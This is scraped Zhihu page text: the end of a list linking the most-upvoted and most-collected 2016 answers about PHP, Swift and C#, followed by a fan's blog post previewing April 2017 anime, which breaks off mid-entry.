href=&https://www.zhihu.com/question//answer/& class=&internal&&学习分布式系统需要怎样的知识? - 马超的回答 - 知乎&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&C++ 难在哪? - 灵剑的回答 - 知乎&/a&&p&&i&5.2收藏最多的前5个回答&/i&&/p&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&计算机领域有哪些像《鸟哥的Linux私房菜》这样通俗易懂的学习资料? - vczh 的回答 - 知乎&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&学习分布式系统需要怎样的知识? - 马超的回答 - 知乎&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&计算机领域有哪些像《鸟哥的Linux私房菜》这样通俗易懂的学习资料? - 罗文益的回答 - 知乎&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何塑造一个拿的出手的 GitHub 账号?&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何去阅读并学习一些优秀的开源框架的源码? - phodal 的回答 - 知乎&/a&&br&&p&&b&&i&&u&6、PHP - 2016年度回答&/u&&/i&&/b&&/p&&p&&i&6.1赞同最多的前5个回答&/i&&/p&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&零基础应该选择学习 Java、PHP 还是 Python?&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&学PHP最快要多久? 学习路线?要不要报培训班?&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&大部分已经干了两三年的程序员水平是怎样的? - 知乎用户的回答 - 知乎&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&感觉技术提高很慢,怎么安抚浮躁的情绪? - 匿名用户的回答 - 知乎&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&27岁想转python,是否值得? - 知乎用户的回答 - 知乎&/a&&p&&i&6.2收藏最多的前5个回答&/i&&/p&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&零基础应该选择学习 Java、PHP 还是 Python?&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&学PHP最快要多久? 学习路线?要不要报培训班?&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&新手应该如何学习 PHP 语言?&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&感觉技术提高很慢,怎么安抚浮躁的情绪? - 匿名用户的回答 - 知乎&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&php 程序员,来北京一个星期了还没有找到工作,怎么办?&/a&&p&&i&&u&&b&7、Swift - 2016年度回答&/b&&/u&&/i&&br&&/p&&p&&i&7.1&/i&&i&赞同最多的前5个回答&/i&&/p&&p&1354 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&阿里、百度和腾讯为什么不学谷歌、苹果甚至 Mozilla 开发一种新的语言?&/a&&/p&&p&217 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何系统地自学 Swift 语言并学会 iOS 开发?&/a&&/p&&p&178 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&阿里、百度和腾讯为什么不学谷歌、苹果甚至 Mozilla 开发一种新的语言?&/a&&/p&&p&155 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&Objective-C 输出函数 NSLog 里的 log 是什么缩写?&/a&&/p&&p&136 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&iOS开发包含哪些内容? - 彭先僧的回答 - 知乎&/a&&/p&&br&&p&&i&7.2&/i&&i&收藏最多的前5个回答&/i&&/p&&p&379 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&阿里、百度和腾讯为什么不学谷歌、苹果甚至 Mozilla 开发一种新的语言?&/a&&/p&&p&99 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何系统地自学 Swift 语言并学会 iOS 开发?&/a&&/p&&p&96 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&阿里、百度和腾讯为什么不学谷歌、苹果甚至 Mozilla 开发一种新的语言?&/a&&/p&&p&27 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&Objective-C 输出函数 NSLog 里的 log 是什么缩写?&/a&&/p&&p&26 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&iOS开发包含哪些内容? - 彭先僧的回答 - 知乎&/a&&/p&&p&&i&&u&&b&8、C# - 2016年度回答&/b&&/u&&/i&&br&&/p&&p&&i&8.1&/i&&i&赞同最多的前5个回答&/i&&/p&&p&545 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&可以用C#编程语言做哪些好玩的东西? - 知乎用户的回答 - 知乎&/a&&/p&&p&479 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&使用Visual Studio写代码有什么十分有用的神奇技巧?&/a&&/p&&p&473 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何系统掌握游戏编程中3D图形学相关的基础? - Milo Yip 的回答 - 知乎&/a&&/p&&p&416 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&c#如何进阶? - 知乎用户的回答 - 知乎&/a&&/p&&p&265 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&可以用C#编程语言做哪些好玩的东西? - steadyfield 的回答 - 知乎&/a&&/p&&p&&i&8.2&/i&&i&收藏最多的前5个回答&/i&&/p&&p&901 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何系统掌握游戏编程中3D图形学相关的基础? - Milo Yip 的回答 - 知乎&/a&&/p&&p&845 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&使用Visual Studio写代码有什么十分有用的神奇技巧?&/a&&/p&&p&384 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&可以用C#编程语言做哪些好玩的东西? - 知乎用户的回答 - 知乎&/a&&/p&&p&364 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&c#如何进阶? - 知乎用户的回答 - 知乎&/a&&/p&&p&290 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&二本学生如何获得微软的实习机会? - 陈天宇的回答 - 知乎&/a&&/p&&p&&u&&b&更多文章,关注:&a href=&https://zhuanlan.zhihu.com/passer& class=&internal&&知乎专栏&/a&&/b&&/u&&/p&
前些日子,知乎发布了2016年度一百问: ,它涵盖了 2016 年知乎上最热门的 100 个讨论。有了问题,大家自然会想到回答,2016年度最热的回答是什么?或许对于问题,大家更愿意看到高赞/高收藏的回答。考虑到整理整个知乎社区的所有高赞…
&figure&&img src=&https://pic2.zhimg.com/v2-20b668ee7cdfebd351eaf48ea557e0a6_b.jpg& data-rawwidth=&1920& data-rawheight=&1080& class=&origin_image zh-lightbox-thumb& width=&1920& data-original=&https://pic2.zhimg.com/v2-20b668ee7cdfebd351eaf48ea557e0a6_r.jpg&&&/figure&&p&&b&【四月新番一览】&/b&(上)&/p&&p&呀Hello~&/p&&p&一月番已经接近尾声,四月番也快到了,今天来分享一下自己比较期待的几部四月番:&figure&&img src=&https://pic2.zhimg.com/v2-c93cad14dcf471d9b0831fde43f83fd5_b.jpg& data-rawwidth=&640& data-rawheight=&389& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic2.zhimg.com/v2-c93cad14dcf471d9b0831fde43f83fd5_r.jpg&&&/figure&&/p&&ul&&li&&p&&b&进击的巨人 第二季&/b&&/p&&/li&&li&&p&制作:WIT STUDIO&br&&/p&&/li&&li&&p&导演:肥塚正史&荒木哲郎&/p&&/li&&li&&p&霸权(闭嘴)预定&/p&&/li&&li&&p&&b&人类,只有在放弃战斗的那一刻才算失败!&/b&&br&&/p&&/li&&/ul&&p&不知道有多少看巨人入宅的朋友,虽然我算不上看巨人入宅,但当初非常痴迷,甚至完结之后买齐了后续剧情的漫画。预测巨人第二季会比第一季更加精彩,前面挖的一些坑也该填了,墙壁之谜,超大巨人的真相等等应该会在第二季涉及到。&/p&&p&PV里出现的艾伦在揭穿盔甲巨人的真面目之后与之战斗的情节是非常爽快的一段高潮部分。除此之外,最吸引我的当然还是三爷(的腹肌)啦!(某百英雄里的虐菜大流氓)&/p&*&figure&&img src=&https://pic1.zhimg.com/v2-fd797d6de26aa35c6d6fb1_b.jpg& data-rawwidth=&548& data-rawheight=&775& class=&origin_image zh-lightbox-thumb& width=&548& data-original=&https://pic1.zhimg.com/v2-fd797d6de26aa35c6d6fb1_r.jpg&&&/figure&&ul&&li&&b&火影忍者 博人传之火影次世代&/b&&br&&/li&&br&&li&&p&小丑社&/p&&/li&&li&&p&阿部记之、山下宏幸&/p&&/li&&li&&p&我爹是火影,我爷爷是火影,我爷爷的老师的老师是火影,我爹的师傅的女神是火影,我爹的师傅的女神的祖父和他弟弟都是火影!我爹的老师还是火影,我全家都TM是火影!&/p&&/li&&/ul&&p&剧场版的博人传给我的印象还不错,其实对于博人这种从小就是人生赢家的主角我没太在意,反倒非常喜欢佐良娜这种强势的少女角色。期待木叶村的新生代势力能在动画中有好的表现。&/p&&p&* &figure&&img src=&https://pic4.zhimg.com/v2-d98dde850cfabdfac556069a_b.jpg& data-rawwidth=&519& data-rawheight=&720& class=&origin_image zh-lightbox-thumb& width=&519& data-original=&https://pic4.zhimg.com/v2-d98dde850cfabdfac556069a_r.jpg&&&/figure&&br&&/p&&ul&&li&&p&&b&路人女主的养成方法 第二季&/b&&/p&&/li&&li&&p&A-1 Pictures&br&&/p&&/li&&li&&p&龟井干太&/p&&/li&&li&&p&白学现场继续进行,我诸葛惠将成为新世界的女主角!&/p&&/li&&/ul&&p&围绕着几个人一起制作游戏展开的青春故事。第一季的制作水平很高,尤其是用在黑丝上的经费足到令人发指。加藤惠独特的魅力也让她成为了无数宅男们理想中的本命,终于,在这个四月,我们又能见到心仪的路人女主了!&/p&&p&* &figure&&img src=&https://pic4.zhimg.com/v2-d9a4d0c2d41df879cd7ca12b81fffef5_b.jpg& data-rawwidth=&640& data-rawheight=&386& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic4.zhimg.com/v2-d9a4d0c2d41df879cd7ca12b81fffef5_r.jpg&&&/figure&&br&&/p&&ul&&li&&p&&b&我的英雄学院 第二季&/b&&/p&&/li&&li&&p&BONES(骨头社)&br&&/p&&/li&&li&&p&长崎健司&/p&&/li&&li&&p&拿生命在开挂的男人。&br&&/p&&/li&&/ul&&p&上一季的结局有些仓促,小小英雄刚刚学有所成,还没来得及打败几个小boss就完结了,实在是看的有些不过瘾。时隔一年,这个绿毛小子能不能成为真正的英雄呢?&/p&&p&*&figure&&img src=&https://pic2.zhimg.com/v2-9bd2fce0e9efa3a6c46e3ccb92d8964d_b.jpg& data-rawwidth=&640& data-rawheight=&450& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic2.zhimg.com/v2-9bd2fce0e9efa3a6c46e3ccb92d8964d_r.jpg&&&/figure&&/p&&ul&&li&&p&&b&我的妹妹是黄漫老师&br&&/b&&/p&&/li&&li&&p&A-1 Pictures&/p&&/li&&li&&p&竹下良平&/p&&/li&&li&&p&我的妹妹怎么又这么可爱!&br&&/p&&/li&&/ul&&p&家里蹲的妹妹居然是H漫画的插画师!知道真相的哥哥该怎么正视这样的的兄妹关系?&/p&&p&*&figure&&img src=&https://pic4.zhimg.com/v2-dbbc3b2910_b.jpg& data-rawwidth=&618& data-rawheight=&606& class=&origin_image zh-lightbox-thumb& width=&618& data-original=&https://pic4.zhimg.com/v2-dbbc3b2910_r.jpg&&&/figure&&br&&/p&&ul&&li&&p&&b&巴哈姆特之怒 第二季&/b&&/p&&/li&&li&&p&Cygames、MAPPA&br&&/p&&/li&&li&&p&佐藤敬一&/p&&/li&&li&&p&经费在燃烧,人神魔的史诗级大战!&br&&/p&&/li&&/ul&&p&讲述了前作中巴哈姆特被再次封印十年后的故事。如果你喜欢魔幻故事,又爱看精良的制作,这一部绝对不容错过。(不过居然换女主了!还是比较萌阿米拉)&figure&&img src=&https://pic3.zhimg.com/v2-be260f7b3f2d2c0ca4b9dd_b.jpg& data-rawwidth=&565& data-rawheight=&798& class=&origin_image zh-lightbox-thumb& width=&565& data-original=&https://pic3.zhimg.com/v2-be260f7b3f2d2c0ca4b9dd_r.jpg&&&/figure&&/p&&ul&&li&&p&&b&樱花任务&/b&&br&&/p&&/li&&li&&p&P.A.WORKS&/p&&/li&&li&&p&增井壮一&/p&&/li&&li&&p&&b&作为地域小镇振兴的一环,希望你能来当国王!&/b&&/p&&/li&&/ul&&p&大学生村官振兴小镇的故事——道理我都懂,但这么早就决定由她当国王会不会给人。。。?&/p&&p&(PA忠实粉丝一定会看的)&/p&&p&*&/p&&figure&&img src=&https://pic4.zhimg.com/v2-d61baa3d99eadadf352e6_b.jpg& data-rawwidth=&572& data-rawheight=&802& class=&origin_image zh-lightbox-thumb& width=&572& data-original=&https://pic4.zhimg.com/v2-d61baa3d99eadadf352e6_r.jpg&&&/figure&&br&&ul&&li&&p&&b&Re:CREATORS&/b&&br&&/p&&/li&&li&&p&TROYCA(az的制作公司)&/p&&/li&&li&&p&青木英&/p&&/li&&li&&p&看到re就知道是穿越。。&/p&&/li&&/ul&&p&看了一下PV,有机甲,有法阵,有骑士,有魔法少女,这种大杂烩般的人设不知道会讲个怎样的故事。不过应该会围绕着科学Vs魔法这样的老话题展开吧。&/p&&p&音乐由泽野弘之担当,声优阵容也够强大,希望不要再虎头蛇尾(吐血)&/p&&p&*&figure&&img src=&https://pic3.zhimg.com/v2-ae81b4c1cd0606fd3bab_b.jpg& data-rawwidth=&640& data-rawheight=&830& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic3.zhimg.com/v2-ae81b4c1cd0606fd3bab_r.jpg&&&/figure&&br&&/p&&ul&&li&&p&&b&正确的KADO&/b&&/p&&/li&&li&&p&东映动画&/p&&/li&&li&&p&村田和也&/p&&/li&&li&&p&原创动画,PV给人一种不明觉厉的感觉,画风不错期待一下。&br&&/p&&/li&&/ul&&p&异世界外交题材???&/p&&p&*&figure&&img src=&https://pic3.zhimg.com/v2-5b339beba_b.jpg& data-rawwidth=&540& data-rawheight=&753& class=&origin_image zh-lightbox-thumb& width=&540& data-original=&https://pic3.zhimg.com/v2-5b339beba_r.jpg&&&/figure&&/p&&ul&&li&&p&&b&恋爱暴君&/b&&br&&/p&&/li&&li&&p&EMT2&/p&&/li&&li&&p&浊川敦&/p&&/li&&li&&p&能够让任意两人强制接吻的不可思议道具“亲吻笔记”,想想还是挺带感的呢!(光看这一个设定就知道是后宫喜剧了。)&/p&&p&* &figure&&img src=&https://pic4.zhimg.com/v2-54b63acc7efa5cd812288a_b.jpg& data-rawwidth=&640& data-rawheight=&357& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic4.zhimg.com/v2-54b63acc7efa5cd812288a_r.jpg&&&/figure&&/p&&/li&&li&&p&&b&重启咲良田&/b&&/p&&/li&&li&&p&david production&/p&&/li&&li&&p&川面真也&/p&&/li&&/ul&&p&轻小说改编,应该又是时光倒流改变过去之类的,不过画风很棒,声优也都比较喜欢。&/p&&p&*&figure&&img src=&https://pic4.zhimg.com/v2-6aace78dc197_b.jpg& data-rawwidth=&537& data-rawheight=&761& class=&origin_image zh-lightbox-thumb& width=&537& data-original=&https://pic4.zhimg.com/v2-6aace78dc197_r.jpg&&&/figure&&br&&/p&&ul&&li&&p&&b&时钟机关之星&br&&/b&&/p&&/li&&li&&p&XEBEC(株式会社ジーベック)&/p&&/li&&li&&p&长泽刚&/p&&/li&&li&&p&“灭亡后的地球,变成一切都是用齿轮与发条再度建构的世界。”&br&&/p&&/li&&/ul&&p&轻小说改编作品,讲述了主角遇到从天而降的人偶少女之后发生的一系列故事。动画XEBEC制作,可能有人不熟悉这家公司,但是他们制作的出包王女和奈亚子你们一定听说过。&br&&/p&&p&(没看过原作,但是战斗人偶这种设定不禁让人联想到机巧少女不会受伤。总之,希望不会是一部套路作品啦!)&br&&/p&&p&(天降萌妹这种好事什么时候能落到我头上!)&/p&&p&*&figure&&img src=&https://pic3.zhimg.com/v2-22dfc4ebf28edde7d4fc3_b.jpg& data-rawwidth=&640& data-rawheight=&918& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic3.zhimg.com/v2-22dfc4ebf28edde7d4fc3_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/v2-0caabd7af76_b.jpg& data-rawwidth=&640& data-rawheight=&472& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic1.zhimg.com/v2-0caabd7af76_r.jpg&&&/figure&&br&&/p&&ul&&li&&p&&b&武装少女&/b&&/p&&/li&&li&&p&银链&}

我要回帖

更多关于 斐讯产品 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信